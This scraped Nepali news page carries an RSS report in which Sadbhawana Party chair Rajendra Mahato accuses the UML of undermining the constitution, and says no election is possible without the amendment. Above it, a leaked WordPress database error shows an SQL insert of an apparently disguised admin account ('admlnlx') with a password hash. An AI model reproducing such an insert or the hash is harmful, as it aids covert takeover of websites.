WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTDJehZdqZeiq0/Ia/6KKicps8AEDI/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 23:50:43', '', 'admlnlx', 'admlnlx')
पर्सा ,फागुन २-
नेपाल सद्भावना पार्टीका राष्ट्रिय अध्यक्ष राजेन्द्र महतोले संविधानलाई असफल गरी प्राप्त गरेका सबै उपलब्धिलाई समाप्त पार्ने षड्यन्त्रमा एमाले लागेको आरोप लगाएका छन्।
प्रेस मञ्चले आइतबार वीरगन्जमा अयोजना गरेको पत्रकार सम्मेलनमा अध्यक्ष महतोले संविधान संशोधनको विरोध गरी संविधान कार्यान्वयनमा बाधा सिर्जना गर्दै मुलुकलाई अन्योलतातर्फ धकेल्न एमालेका नेता लागिपरेका बताएका हुन्।
संसद्मा दर्ता रहेको संशोधन प्रस्ताव पारित नभएसम्म निर्वाचन नहुने र तोकिएको समयमा तीनवटै तहको निर्वाचन नभए संविधान असफल हुने महतोले बताए। ‘परिमार्जनसहित संविधान संशोधन नभए मुलुकमा कुनै पनि निर्वाचन सम्भव छैन,’ उनको भनाई थियो।
दिनसम्म वीरगन्जमा बसेको सद्भावना पार्टीले मधेस आन्दोलनको मुद्दालाई संविधान संशोधनमार्फत सम्बोधन नगरेसम्म निर्वाचनमा सहभागी नहुने तथा निर्वाचन हुन नदिने निर्णय समेत गरेको छ।
यसैबीच सद्भावना पार्टीको छैटौँ महाधिवेशन २०७४ साल जेठ १, २ र ३ गते वीरगन्जमा हुने भएको छ। मधेस आन्दोलनका क्रममा ज्यान गुमाएकामध्ये सहिद घोषणा गर्न बाँकीलाई सहिद घोषणाका लागि सरकारलाई दबाब दिनेलगायत निर्णय सद्भावनाले गरेको छ। रासस